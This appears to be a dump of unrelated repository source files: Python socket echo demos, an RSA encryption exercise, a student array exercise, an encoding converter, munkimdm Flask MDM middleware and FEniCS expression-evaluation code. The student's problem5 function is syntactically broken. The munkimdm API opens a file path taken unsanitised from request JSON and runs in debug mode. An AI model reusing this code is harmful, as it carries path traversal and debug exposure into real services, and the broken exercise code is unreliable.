return socketserver.TCPServer.server_close(self)
def finish_request(self, request, client_address):
self.logger.debug('finish_request(%s, %s)', request, client_address)
return socketserver.TCPServer.finish_request(self, request, client_address, )
def close_request(self, request_address):
self.logger.debug('close_request(%s)', request_address)
return socketserver.TCPServer.close_request(self, request_address, )
def shutdown(self):
self.logger.debug('shutdown()')
return socketserver.TCPServer.shutdown(self)
if __name__ == '__main__':
address = ('localhost', 30001) # let the kernel assign a port
server = EchoServer(address, EchoRequestHandler)
server.serve_forever()
# ip, port = server.server_address # what port was assigned?
# # Start the server in a thread
# t = threading.Thread(target=server.serve_forever)
# t.setDaemon(True) # don't hang on exit
# t.start()
# print(f'Server loop running in thread: {t.getName()}')
|
dggsoares/Simple_Python_Exercises | python_201/05.1 - rsa_encryption.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
import base64
def write_keys_on_disk(private_key, public_key):
pem_private = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
pem_public = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
with open('private_key.pem', 'wb') as f:
f.write(pem_private)
with open('public_key.pem', 'wb') as f:
f.write(pem_public)
def load_keys_from_disk():
with open("private_key.pem", "rb") as key_file:
private_key = serialization.load_pem_private_key(
key_file.read(),
password=<PASSWORD>,
backend=default_backend()
)
with open("public_key.pem", "rb") as key_file:
public_key = serialization.load_pem_public_key(
key_file.read(),
backend=default_backend()
)
return private_key, public_key
def create_keys():
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=4096,
backend=default_backend()
)
public_key = private_key.public_key()
return private_key, public_key
def encrypt_message(public_key, message):
encrypted_message = public_key.encrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA512(),
label=None
)
)
return encrypted_message
def decrypt_message(private_key, message):
original_message = private_key.decrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA512(),
label=None
)
)
return original_message
def encrypt_file(key, file):
encrypted_file = bytes()
chunk = 256
with open(file, "rb") as f:
while True:
data = f.read(chunk)
if data:
encrypted_file += encrypt_message(key, base64.b64encode(data))
else:
break
with open(file + '.enc', 'wb') as f:
f.write(encrypted_file)
def decrypt_file(key, file):
original_file = bytes()
chunk = 256
with open(file, "rb") as f:
while True:
data = f.read(chunk)
if data:
original_file += decrypt_message(key, data)
else:
break
with open(file + '.original', 'wb') as f:
f.write(original_file)
def main():
private_key, public_key = create_keys()
write_keys_on_disk(private_key, public_key)
print(f'[+] Simple RSA Encryption/Decryption [+]')
message = input(' | \t[X] Message to encrypt: ').encode()
encrypted_message = encrypt_message(public_key, message)
decrypted_message = decrypt_message(private_key, encrypted_message)
print(f' | \t | Message: {message}')
print(f' | \t | Encrypted message: {encrypted_message[:25]}')
print(f' | \t | Decrypted message: {decrypted_message}')
print(' | \t[X] -------------------------- [X]')
print(f'[+] ------------------------------- [+]')
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | samples/client_socketserver.py | import socket
from threading import Thread
import random
import string
import base64
ADDRESS = ('172.16.58.3', 30001)
def gera_lixo():
characters = string.ascii_letters + string.punctuation
return base64.b64encode(''.join(random.choice(characters) for _ in range(20)).encode()).decode()
class ClientThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(client_id):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(ADDRESS)
message = f'\n\tClient: {client_id} \n\tMESSAGE: {gera_lixo()}'
s.send(message.encode())
response = s.recv(2048).decode()
print('--------------------------------------')
print(f'Client {client_id}')
print(f'SENT: {message}')
print(f'RECV: {response}')
print('--------------------------------------')
if __name__ == '__main__':
clients_threads = []
for i in range(10):
client = ClientThread()
client.start()
clients_threads.append(client)
for t in clients_threads:
t.join() |
cs-fullstack-2019-spring/python-arraycollections-cw-ChelseaW | Problem1.py | def main():
# problem1()
# problem2()
# problem3()
# problem4()
problem5()
# Create a function with the variable below. After you create the variable do the instructions below that.
#
# arrayForProblem2 = ["Kenn", "Kevin", "Erin", "Meka"]
# a) Print the 3rd element of the numberList.
#
# b) Print the size of the array
#
# c) Delete the second element.
#
# d) Print the 3rd element.
# Function is printing size and removing element from the array
# def problem1():
#
# arrayForProblem2 = ["Kenn", "Kevin", "Erin", "Meka"]
# print(arrayForProblem2[3])
# print(len(arrayForProblem2))
# arrayForProblem2.remove(2)
# print(arrayForProblem2[3])
# Create a function that has a loop that quits with ‘q’. If the user doesn't enter 'q', ask them to input another string.
# def problem2():
# creator = ""
# while creator != 'q':
# creator = input("Something weird")
# print(creator)
# Create a function that contains a collection of information for the following. After you create the collection do the instructions below that.
#
# Jonathan/John
# Michael/Mike
# William/Bill
# Robert/Rob
# a) Print the collection
#
# b) Print William's nickname
# def problem3():
#
# theCrew = {
# "Jonathan": " John",
# "Michael":" Mike",
# "William":"Bill",
# "Robert":"Rob"
# }
# print(theCrew)
# print(theCrew["William"])
# Create an array of 5 numbers. Using a loop, print the elements in the array reverse order. Do not use a function
# def problem4():
#
#
# digits = [20,12,19,69,88]
# for eachElement in range(len(digits)-1,-1,-1):
# print(digits[eachElement])
# for eachEl in range(0, len(digits)-1, 1)
# range(0,5) = [0,1,2,3,4]
# for eachEl in range():
# print(digits[eachEl])
# for digits in range(-88,11):
# reversed(digits)
# digits -+1
# print(digits)
# Create a function that will have a hard coded array then ask the user for a number.
# Use the userInput to state how many numbers in an array are higher, lower, or equal to it.
def problem5():
listOfDigits = [1,2,3,4,5]:
listOfDigits = input("Give a number")
# print(listOfDigits(1))
# print(listOfDigits(4))
# print(listOfDigits(5))
higher = 0
lower= 0
equal = 0
for eachElement in listOfDigits():
if(listOfDigits== eachElement):
+=1
print("Lower")
if(listOfDigits== eachElement):
fourCount +=1
print("Equal")
if(listOfDigits== eachElement):
fiveCount +=1
print("Higher")
if __name__ == '__main__':
main() |
sandomingo/cow | cow.py | #!/usr/local/bin/python
# encoding=utf-8
import sys
import codecs
import chardet
import re
def read_then_write(in_file, guess_encoding, out_encoding):
dot_pos = in_file.rfind('.')
output_file = in_file[0:dot_pos] + '(%s)' % out_encoding + in_file[dot_pos:]
writer = open(output_file, 'wb')
reader = open(in_file, 'rw')
for line in reader:
try:
line = codecs.decode(line, guess_encoding)
encoded_line = codecs.encode(line, out_encoding)
writer.write(encoded_line)
except Exception as e:
pass
reader.close()
writer.close()
def extract_info(info_file):
"""
Extract album title, performer and song names from the given album info. file
:param info_file:
:return: (title, performer, [(no, song1), (no, song2), ...])
"""
reader = open(info_file, 'rw')
confidence, guess_encoding = detect(info_file)
songs = []
has_title = False
has_performer = False
for line in reader:
line = line.strip()
try:
line = codecs.decode(line, guess_encoding)
if not has_title and (line.startswith(u"专辑名称:") or line.startswith(u"唱片名称:")):
title = line[5:]
has_title = True
elif not has_performer and line.startswith(u"歌手:"):
performer = line[3:]
has_performer = True
elif not has_performer and line.startswith(u"歌手组合:"):
performer = line[5:]
has_performer = True
elif re.match("^\d\d .+", line):
pos = line.index(' ')
no = line[:pos]
name = line[pos+1:]
songs.append((no, name))
except Exception as e:
print 'Exception: err while process line: ' + line
reader.close()
return title, performer, songs
def rebuild(in_file, info_file):
"""
Rebuild the cue file with the given album info file.
"""
out_encoding = 'utf-8'
title, performer, songs = extract_info(info_file)
album_cue = read_file_as_string(in_file)
# put on title
album_cue = album_cue.replace(u"\"未知标题\"", "\"" + title + "\"")
# put on performer
album_cue = album_cue.replace(u"\"未知艺术家\"", "\"" + performer + "\"")
# put on all songs' names
for song_name in songs:
no, name = song_name
old_name = "Track" + str(no)
album_cue = album_cue.replace(old_name, name)
dot_pos = in_file.rfind('.')
output_file = in_file[0:dot_pos] + '(%s)' % out_encoding + in_file[dot_pos:]
writer = open(output_file, 'wb')
encoded_line = codecs.encode(album_cue, out_encoding)
writer.write(encoded_line)
writer.close()
def read_file_as_string(in_file):
confidence, guess_encoding = detect(in_file)
reader = open(in_file, 'rw')
text = []
for line in reader:
line = codecs.decode(line, guess_encoding)
text.append(line)
return ''.join(text)
def convert(in_file, out_encoding):
confidence, guess_encoding = detect(in_file)
read_then_write(in_file, guess_encoding, out_encoding)
print 'Convert from %s to %s Completed (with a confidence of %.2f%%)!' \
% (guess_encoding, out_encoding, confidence)
def detect(in_file):
with open(in_file, 'rb') as f:
result = chardet.detect(f.read())
confidence = float(result['confidence']) * 100
guess_encoding = result['encoding']
return confidence, guess_encoding
def print_usage():
print 'Usage: '
print ' python cow.py [detect/convert] input_file [output_encoding(default: utf-8)] 检测/转换文件到指定编码'
print ' python cow.py rebuild cue_file album_info_file 使用专辑信息补全cue文件信息'
if __name__ == '__main__':
arg_num = len(sys.argv)
if arg_num > 2:
a_type = sys.argv[1]
input_file = sys.argv[2]
output_encoding = 'utf-8'
if a_type == 'detect':
g_confidence, g_encoding = detect(input_file)
print 'Guess encoding: %s (with a confidence of %.2f%%).' % (g_encoding, g_confidence)
elif a_type == 'convert':
if arg_num > 3:
output_encoding = sys.argv[3]
convert(input_file, output_encoding)
elif a_type == 'rebuild':
album_info_file = sys.argv[3]
rebuild(input_file, album_info_file)
else:
print_usage()
|
munkimdm/munkimdm | env.py | settings = {
'micromdm_url': 'https://micromdm.domain.com',
'micromdm_key': 'SUPER_SECRET_API_KEY',
'basic_auth_user': 'MIDDLEWARE_USERNAME_IN_MUNKI_PKGINFO',
'basic_auth_password': '<PASSWORD>',
'configurl': 'https://vpp.itunes.apple.com/mdm/VPPClientConfigSrv',
'licensesurl': 'https://vpp.itunes.apple.com/mdm/getVPPLicensesSrv',
'assetsurl': 'https://vpp.itunes.apple.com/mdm/getVPPAssetsSrv',
'manageurl': 'https://vpp.itunes.apple.com/mdm/manageVPPLicensesByAdamIdSrv',
'sToken':'<PASSWORD>AB<PASSWORD>'
}
|
munkimdm/munkimdm | munkimdm/munkimdm.py | #!/usr/bin/env python3
from flask import Flask, request
import base64
import requests
from env import settings
from flask_basicauth import BasicAuth
application = Flask(__name__)
application.config["BASIC_AUTH_USERNAME"] = settings.get("basic_auth_user")
application.config["BASIC_AUTH_PASSWORD"] = settings.get("basic_auth_password")
basic_auth = BasicAuth(application)
supported_commands = [
"RestartDevice",
"InstallProfile",
"RemoveProfile",
"ShutDownDevice",
]
@application.route("/api/<command>", methods=["GET", "POST"])
@basic_auth.required
def api(command):
if command not in supported_commands:
return "Command %s not valid.\n" % command
content = request.json
def check(arg):
if arg in content:
payload[arg] = content[arg]
payload = {"request_type": command}
check("udid")
check("pin") # For DeviceLock
check("product_key") # For ScheduleOSUpdate
check("install_action") # For ScheduleOSUpdateScan
check("force") # For ScheduleOSUpdateScan
check("identifier") # For RemoveProfile
if "profile" in content: # For InstallProfile
profile = "/path_to/munki_repo/pkgs/profiles/%s" % content["profile"]
with open(profile, "rb") as f:
bytes = f.read()
payload["Payload"] = base64.b64encode(bytes).decode("ascii")
requests.post(
"{}/v1/commands".format(settings.get("micromdm_url")),
auth=("micromdm", settings.get("micromdm_key")),
json=payload,
)
return "Issuing %s: Success! \n" % command
if __name__ == "__main__":
application.run(debug=True)
|
munkimdm/munkimdm | mdmauth.py | <filename>mdmauth.py<gh_stars>1-10
import requests
from flask_basicauth import BasicAuth
from nested_lookup import get_occurrence_of_value
from flask import Flask, request
from env import settings
app = Flask(__name__)
app.config['BASIC_AUTH_USERNAME'] = settings.get('basic_auth_user')
app.config['BASIC_AUTH_PASSWORD'] = settings.get('basic_auth_password')
basic_auth = BasicAuth(app)
supported_commands = ['InstallApplication', 'InstallEnterpriseApplication', 'InstallProfile', 'RemoveProfile', 'EnableRemoteDesktop', 'DisableRemoteDesktop', 'SetFirmwarePassword', 'VerifyFirmwarePassword', 'RestartDevice', 'ShutDownDevice']
@app.route('/api/<command>', methods=['GET', 'POST'])
@basic_auth.required
def api(command):
if command not in supported_commands:
return 'Command %s not valid.\n' % command
content = request.json
def check(arg):
if arg in content:
payload[arg] = content[arg]
def check_int(arg):
if arg in content:
payload[arg] = int(content[arg])
payload = {
'request_type': command
}
check('udid')
check('currentpassword') # For SetFirmwarePassword
check('newpassword') # For SetFirmwarePassword
check('password') # For VerifyFirmwarePassword
check('pin') # For DeviceLock
check('product_key') # For ScheduleOSUpdate
check('install_action') # For ScheduleOSUpdateScan
check('force') # For ScheduleOSUpdateScan
check('payload') # For InstallProfile
check('identifier') # For RemoveProfile
check('manifest_url') # For InstallEnterpriseApplication
check('serial') # For InstallVPPApplication
check_int('itunes_store_id') # For InstallVPPApplication
if 'InstallApplication' in command:
options = {}
options['purchase_method'] = int(1)
payload['options'] = options
# Get List of Licenses associated with Serial
params = dict(
sToken=settings.get('sToken'),
serialNumber=content['serial']
)
resp = requests.get(url=settings.get('licensesurl'), json=params)
data = resp.json()
print(data)
if get_occurrence_of_value(data, value=content['itunes_store_id']) == 0:
# Assign this to this serial number
print("Not assigned to this serial, doing so now")
params = dict(
sToken=settings.get('sToken'),
associateSerialNumbers=[content['serial']],
pricingParam="STDQ",
adamIdStr=content['itunes_store_id']
)
print(requests.post(url=settings.get('manageurl'), json=params))
print(params)
requests.post(
'{}/v1/commands'.format(settings.get('micromdm_url')),
auth=('micromdm', settings.get('micromdm_key')),
json=payload
)
return 'Issuing %s: Success! \n' % payload
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
|
MiroK/fenics-cacl | xcalc/interpreter.py | <filename>xcalc/interpreter.py
from ufl.corealg.traversal import traverse_unique_terminals
from ufl.conditional import (LT, GT, LE, GE, EQ, NE, AndCondition, OrCondition,
NotCondition)
from dolfin import (Function, VectorFunctionSpace, interpolate, Expression,
as_vector, Constant, as_matrix)
import numpy as np
import ufl
from itertools import imap, repeat, izip
import operator
import timeseries
import operators
from clement import clement_interpolate
from utils import *
def Eval(expr):
'''
This intepreter translates expr into a function object or a number. Expr is
defined via a subset of UFL language. Letting f, g be functions in V
Eval(op(f, g)) is a function in V with coefs given by (op(coefs(f), coef(g))).
'''
return Interpreter.eval(expr)
class Interpreter(object):
'''
This intepreter translates expr into a function object or a number. Expr is
defined via a subset of UFL language. Letting f, g be functions in V
Eval(op(f, g)) is a function in V with coefs given by (op(coefs(f), coef(g))).
'''
# Expression which when evaluated end up in the same space as the arguments
# or require no reshaping of arraysbefore numpy is applied
no_reshape_type = {
ufl.algebra.Sum: np.add,
ufl.algebra.Abs: np.abs,
ufl.algebra.Division: np.divide,
ufl.algebra.Product: np.multiply,
ufl.algebra.Power: np.power,
ufl.mathfunctions.Sin: np.sin,
ufl.mathfunctions.Cos: np.cos,
ufl.mathfunctions.Sqrt: np.sqrt,
ufl.mathfunctions.Exp: np.exp,
ufl.mathfunctions.Ln: np.log,
ufl.mathfunctions.Tan: np.tan,
ufl.mathfunctions.Sinh: np.sinh,
ufl.mathfunctions.Cosh: np.cosh,
ufl.mathfunctions.Tanh: np.tanh,
ufl.mathfunctions.Asin: np.arcsin,
ufl.mathfunctions.Acos: np.arccos,
ufl.mathfunctions.Atan: np.arctan,
ufl.mathfunctions.Atan2: np.arctan2,
ufl.operators.MinValue: np.minimum,
ufl.operators.MaxValue: np.maximum,
LT: lambda x, y: np.array(x < y, dtype=float),
GT: lambda x, y: np.array(x > y, dtype=float),
LE: lambda x, y: np.array(x <= y, dtype=float),
GE: lambda x, y: np.array(x >= y, dtype=float),
EQ: lambda x, y: np.array(x == y, dtype=float),
NE: lambda x, y: np.array(x != y, dtype=float),
AndCondition: lambda x, y: np.array(np.logical_and(x, y), dtype=float),
OrCondition: lambda x, y: np.array(np.logical_or(x, y), dtype=float),
NotCondition: lambda x: np.array(np.logical_not(x), dtype=float),
ufl.operators.Conditional: lambda pred, true, false: np.where(pred, true, false)
}
# Expression which when evaluated end up in general in different space than
# the arguments/require manipulations before numpy is applied
reshape_type = {
ufl.tensoralgebra.Inverse: np.linalg.inv,
ufl.tensoralgebra.Transposed: np.transpose,
ufl.tensoralgebra.Sym: lambda A: 0.5*(A + A.T),
ufl.tensoralgebra.Skew: lambda A: 0.5*(A - A.T),
ufl.tensoralgebra.Deviatoric: lambda A: A - np.trace(A)*np.eye(len(A))*(1./len(A)),
ufl.tensoralgebra.Cofactor: lambda A: np.linalg.det(A)*(np.linalg.inv(A)).T,
ufl.tensoralgebra.Determinant: np.linalg.det,
ufl.tensoralgebra.Trace: np.trace,
ufl.tensoralgebra.Dot: np.dot,
ufl.tensoralgebra.Cross: np.cross,
ufl.tensoralgebra.Outer: np.outer,
ufl.tensoralgebra.Inner: np.inner,
ufl.tensors.ListTensor: lambda *x: np.hstack(x)
}
# FIXME: ListTensor(foo, indices=None) <= we have no support for indices
# Node to be handled by Clement interpolation
diff_type = (ufl.differentiation.Grad,
ufl.differentiation.Div,
ufl.differentiation.Curl,
ufl.differentiation.NablaGrad,
ufl.differentiation.NablaDiv)
# Other's where Eval works
terminal_type = (Function, int, float)
value_type = (ufl.algebra.ScalarValue, ufl.algebra.IntValue)
index_type = (ufl.indexed.Indexed, )
compose_type = (ufl.tensors.ComponentTensor, )
@staticmethod
def eval(expr):
# Guys with their own logic for collapsing into functions
# Okay we combine 2 design patters, LazyNodes do it themselves
# series rely on the interpreter
if isinstance(expr, operators.LazyNode):
return expr.evaluate()
# For series we eval each node and make a series of functions
# NOTE: intersept here because TempSeries is a terminal type
if isinstance(expr, timeseries.TempSeries):
return timeseries.TempSeries(zip(map(Interpreter.eval, expr), expr.times))
# Terminals/base cases (also TempSeries) -> identity
if isinstance(expr, Interpreter.terminal_type): return expr
# To number
if isinstance(expr, Interpreter.value_type): return expr.value()
# To number
if isinstance(expr, Constant): return float(expr)
# To number
if isinstance(expr, ufl.constantvalue.Zero): return 0
# Recast spatial coordinate as CG1 functions
if isinstance(expr, ufl.geometry.SpatialCoordinate):
mesh = expr.ufl_domain().ufl_cargo()
r = Expression(('x[0]', 'x[1]', 'x[2]')[:mesh.geometry().dim()], degree=1)
return interpolate(r, VectorFunctionSpace(mesh, 'CG', 1))
# Okay: now we have expr with arguments. If this expression involves
# times series then all the non number arguments should be compatible
# time series
terminals = filter(lambda t: isinstance(t, Function), traverse_unique_terminals(expr))
# Don't mix function and terminals
series = filter(lambda t: isinstance(t, timeseries.TempSeries), terminals)
assert len(series) == len(terminals) or len(series) == 0, map(type, terminals)
# For series, we apply op to functions and make new series
if series:
return series_rule(expr)
expr_type = type(expr)
# Require reshaping and all args are functions
if expr_type in Interpreter.reshape_type:
return numpy_reshaped(expr, op=Interpreter.reshape_type[expr_type])
# Clement
if expr_type in Interpreter.diff_type:
# NOTE: Clement is its own thing-it does not use this interpreter
# for subexpression evaluation
return clement_interpolate(expr)
# Define tensor by componenents
if isinstance(expr, Interpreter.compose_type):
return component_tensor_rule(expr)
# A indexed by FixedIndex or Index
if isinstance(expr, Interpreter.index_type):
return indexed_rule(expr)
# No reshaping neeed
op = Interpreter.no_reshape_type[expr_type] # Throw if we don't support this
args = map(Interpreter.eval, expr.ufl_operands)
# Manipulate coefs of arguments to get coefs of the expression
coefs = map(coefs_of, args)
V_coefs = op(*coefs)
# Make that function
V = space_of(args)
return make_function(V, V_coefs)
def numpy_reshaped(expr, op):
'''Get the coefs by applying the numpy op to reshaped argument coefficients'''
args = map(Interpreter.eval, expr.ufl_operands)
# Exception to the rules are some ops with scalar args
if isinstance(expr, (ufl.tensoralgebra.Inner, ufl.tensoralgebra.Dot)):
if all(arg.ufl_shape == () for arg in args):
return Interpreter.eval(args[0]*args[1])
# Construct by numpy with op applied args of expr and reshaping as shape_res
return numpy_op_foo(args, op=op, shape_res=expr.ufl_shape)
def indexed_rule(expr):
'''Function representing f[index] so we end up with scalar'''
shape_res = expr.ufl_shape
assert isinstance(expr, ufl.indexed.Indexed)
f, index = expr.ufl_operands
# What to index
f = Interpreter.eval(f)
# How to index
shape = f.ufl_shape
indices = tuple(int(index) if isinstance(index, ufl.indexed.FixedIndex) else slice(l)
for l, index in zip(shape, index.indices()))
# This could be implemented more efficiently (see earilier commits)
# However, below is a more ideas which is that op is just a getitem
op = lambda A, i=indices: A[i]
return numpy_op_foo((f, ), op=op, shape_res=shape_res)
def series_rule(expr):
'''Eval expression where the terminals are time series'''
foos = filter(lambda f: isinstance(f, Function), traverse_unique_terminals(expr))
# Make first sure that the series are compatible in the sense of having same time
# interval
times = timeseries.common_interval(foos)
assert len(times)
# Compatibility of spaces
common_sub_element([f.function_space() for f in foos])
# The idea now is to propagate the expression by which I mean that
# we grow the expr using nodes in the series
def unpack(expr):
'''expr -> iterable of expr'''
return (apply(type(expr), sum(args, ())) for args in expand(expr.ufl_operands))
def expand(operands):
iterators = []
for o in operands:
if isinstance(o, timeseries.TempSeries):
iterators.append(((f, ) for f in o))
# Nonseries terminal
elif not o.ufl_operands:
iterators.append(((f, ) for f in repeat(o)))
# An expression
else:
iterators.append(((f, ) for f in unpack(o)))
return izip(*iterators)
nodes = unpack(expr)
# A series of new nodes -> series of functions
return Interpreter.eval(timeseries.TempSeries(zip(nodes, times)))
def component_tensor_rule(expr):
'''Tensors whose components are given by computation of some sort.'''
f, free_indices = expr.ufl_operands
# Want to build vectors or matrices
assert len(free_indices) == 1 or len(free_indices) == 2
# Simple rules where the eval node is obtained just by substitution
if not isinstance(f, ufl.indexsum.IndexSum):
# Vector from 2*Constant((1, 2))
if len(free_indices) == 1:
index = free_indices[0]
f = tuple(replace(f, index, FixedIndex(i)) for i in range(expr.ufl_shape[0]))
return Interpreter.eval(as_vector(f))
# Matrix from 2*Costant(((1, 2), (3, 4)))
if len(free_indices) == 2:
mat = []
for i in range(expr.ufl_shape[0]):
f_i = replace(f, free_indices[0], FixedIndex(i))
row = []
for j in range(expr.ufl_shape[1]):
row.append(replace(f_i, free_indices[1], FixedIndex(j)))
mat.append(row)
return Interpreter.eval(as_matrix(mat))
# The idea now is to to build the expression which represents the sum
# needed to compute the component, i.e. explicit transformation of the
# IndexSum node. Computing with scalars this way is not very efficient ->
# FIXME: drop to numpy?
assert isinstance(f, ufl.indexsum.IndexSum)
summand, sum_indices = f.ufl_operands
assert len(sum_indices) == 1 # FIXME: is this necessary
# Be explicit about the sum - have free indices left to be fill
# in by that component
sum_expr = sum(replace(summand, sum_indices[0], FixedIndex(j))
for j in range(f.dimension()))
# Now build the components
if len(free_indices) == 1:
# Sub for the free_i
expr = as_vector(tuple(replace(sum_expr, free_indices[0], FixedIndex(i))
for i in range(f.ufl_index_dimensions[0])))
return Interpreter.eval(expr)
mat = []
for i in range(f.ufl_index_dimensions[0]):
# Sub i
sub_i = replace(sum_expr, free_indices[0], FixedIndex(i))
row = []
for j in range(f.ufl_index_dimensions[1]):
# Sub j
row.append(replace(sub_i, free_indices[1], FixedIndex(j)))
mat.append(row)
expr = as_matrix(mat)
return Interpreter.eval(expr)
|
MiroK/fenics-cacl | test/test_operators.py | from xcalc.interpreter import Eval
from xcalc.timeseries import TempSeries
from xcalc.operators import (Eigw, Eigv, Mean, RMS, STD, SlidingWindowFilter,
Minimum, Maximum)
from dolfin import *
import numpy as np
import unittest
def error(true, me):
mesh = me.function_space().mesh()
return sqrt(abs(assemble(inner(me - true, me - true)*dx(domain=mesh))))
class TestCases(unittest.TestCase):
'''UnitTest for (some of) the operators'''
def test_eigw(self):
# FIxME: more advances
A = np.array([[1, -2], [-3, 1]])
mesh = UnitSquareMesh(10, 10)
V = TensorFunctionSpace(mesh, 'DG', 0)
f = interpolate(Constant(A), V)
me = Eval(Eigw(f+f)) # Eval o Declared
true = Constant(np.linalg.eigvals(A+A))
self.assertTrue(error(true, me) < 1E-14)
def test_eigv(self):
A = np.array([[1, -2], [-3, 1]])
mesh = UnitSquareMesh(10, 10)
V = TensorFunctionSpace(mesh, 'DG', 0)
f = interpolate(Constant(A), V)
# FIXME: 2*f leads to ComponentTensor which we don't handle well
me = Eval(Eigv(f))
true = Constant((np.linalg.eig(A)[1]).T)
self.assertTrue(error(true, me) < 1E-14)
def test_mean(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'CG', 1)
f = Expression('(x[0]+x[1])*t', t=0, degree=1)
ft_pairs = []
for t in (0, 0.1, 0.4, 0.6, 2.0):
f.t = t
v = interpolate(f, V)
ft_pairs.append((v, t))
mean = Eval(Mean(TempSeries(ft_pairs))) # Eval o Declared
f.t = 1.0
self.assertTrue(error(f, mean) < 1E-14)
def test_rms(self):
mesh = UnitSquareMesh(4, 4)
V = FunctionSpace(mesh, 'CG', 1)
f = Expression('(x[0]+x[1])*t', t=0, degree=1)
ft_pairs = []
for t in np.linspace(0, 2, 80):
f.t = t
v = interpolate(f, V)
ft_pairs.append((v, t))
rms = Eval(RMS(TempSeries(ft_pairs)))
f.t = sqrt(4/3.)
# Due to quadrature error
self.assertTrue(error(f, rms) < 1E-4)
def test_std(self):
mesh = UnitSquareMesh(4, 4)
V = FunctionSpace(mesh, 'CG', 1)
f = Expression('(x[0]+x[1])*t', t=0, degree=1)
ft_pairs = []
for t in np.linspace(0, 2, 80):
f.t = t
v = interpolate(f, V)
ft_pairs.append((v, t))
series = TempSeries(ft_pairs)
std = Eval(STD(series)) # Efficiently in PETSc
# From definition
std_ = Eval(sqrt(Mean(series**2) - Mean(series)**2))
self.assertTrue(error(std_, std) < 1E-14)
def test_sliding_window(self):
mesh = UnitSquareMesh(4, 4)
V = FunctionSpace(mesh, 'CG', 1)
series = TempSeries([(interpolate(Constant(1), V), 0),
(interpolate(Constant(2), V), 1),
(interpolate(Constant(3), V), 2),
(interpolate(Constant(4), V), 3)])
f_series = Eval(SlidingWindowFilter(Mean, 2, series**2))
assert len(f_series) == 3
assert f_series.times == (1, 2, 3)
self.assertTrue(error(Constant(2.5), f_series.getitem(0)) < 1E-14)
self.assertTrue(error(Constant(6.5), f_series.getitem(1)) < 1E-14)
self.assertTrue(error(Constant(12.5), f_series.getitem(2)) < 1E-14)
def test_minimum(self):
A = np.array([[1, -2], [-3, 1]])
mesh = UnitSquareMesh(10, 10)
V = TensorFunctionSpace(mesh, 'DG', 0)
f = interpolate(Constant(A), V)
me = Eval(Minimum(Eigw(f+f))) # Eval o Declared
true = Constant(np.min(np.linalg.eigvals(A+A)))
self.assertTrue(error(true, me) < 1E-14)
def test_maximum(self):
A = np.array([[1, -2], [-3, 1]])
mesh = UnitSquareMesh(10, 10)
V = TensorFunctionSpace(mesh, 'DG', 0)
f = interpolate(Constant(A), V)
me = Eval(Maximum(Eigw(f-3*f))) # Eval o Declared
true = Constant(np.max(np.linalg.eigvals(A-3*A)))
self.assertTrue(error(true, me) < 1E-14)
def test_maximum_fail(self):
mesh = UnitSquareMesh(10, 10)
V = FunctionSpace(mesh, 'RT', 1)
with self.assertRaises(AssertionError):
Eval(Maximum(Function(V))) # Don't know how to collapse this
|
MiroK/fenics-cacl | xcalc/clement.py | <gh_stars>1-10
from dolfin import *
from mpi4py import MPI as piMPI
import ufl
def clement_interpolate(expr):
'''
Here, the Clement interpolant is a CG_1 function over
mesh constructed in two steps (See Braess' Finite element book):
1) For each mesh vertex xj let wj the union of cells that share the vertex
(i.e wj is the support of vj - the basis function of CG_1 function
space such that vj(xj) = 1). Then Qj(expr) is an L2 projection of
expr into constant field on wj.
2) Set Ih(expr) = sum_j Qj(expr)vj.
'''
# Analyze expr and raise if invalid
terminals = _analyze_expr(expr)
# Analyze shape and raise if expr cannot be represented
_analyze_shape(expr.ufl_shape)
shape = expr.ufl_shape
# Extract mesh from expr operands and raise if it is not unique or missing
mesh = _extract_mesh(terminals)
# Compute things for constructing Q
Q = FunctionSpace(mesh, 'DG', 0)
q = TestFunction(Q)
# Forms for L2 means [rhs]
# Scalar, Vectors, Tensors are built from components
# Translate expression into forms for individual components
if len(shape) == 0:
forms = [inner(expr, q)*dx]
elif len(shape) == 1:
forms = [inner(expr[i], q)*dx for i in range(shape[0])]
else:
forms = [inner(expr[i, j], q)*dx for i in range(shape[0]) for j in range(shape[1])]
# Build averaging or summation operator for computing the interpolant
# from L2 averaged components.
V = FunctionSpace(mesh, 'CG', 1)
volumes = assemble(inner(Constant(1), q)*dx)
# Ideally we compute the averaging operator, then the interpolant is
# simply A*component. I have not implemented this for backends other
# than PETSc.
is_petsc = parameters['linear_algebra_backend'] == 'PETSc'
assert is_petsc
A = _construct_averaging_operator(V, volumes)
# L2 means of comps to indiv. cells
means = map(assemble, forms)
# The interpolant (scalar, vector, tensor) is build from components
components = []
for mean in means:
# Scalar
component = Function(V)
A.mult(mean, component.vector())
components.append(component)
# Finalize the interpolant
# Scalar has same space as component
if len(shape) == 0:
uh = components.pop()
uh.vector().apply('insert')
return uh
# We can precompute maps for assigning the components
if len(shape) == 1:
W = VectorFunctionSpace(mesh, 'CG', 1, dim=shape[0])
else:
W = TensorFunctionSpace(mesh, 'CG', 1, shape=shape)
assigner = FunctionAssigner(W, [V]*len(forms))
uh = Function(W)
assigner.assign(uh, components)
uh.vector().apply('insert')
return uh
# Workers--
def _analyze_expr(expr):
'''
A valid expr for Clement interpolation is defined only in terms of pointwise
operations on finite element functions.
'''
# Cannot interpolate expression with Arguments + things which are not well
# defined at vertex
black_listed = (ufl.Argument, ufl.MaxCellEdgeLength, ufl.MaxFacetEdgeLength,
ufl.MinCellEdgeLength, ufl.MinFacetEdgeLength,
ufl.FacetArea, ufl.FacetNormal,
ufl.CellNormal, ufl.CellVolume)
# Elliminate forms
if isinstance(expr, ufl.Form): raise ValueError('Expression is a form')
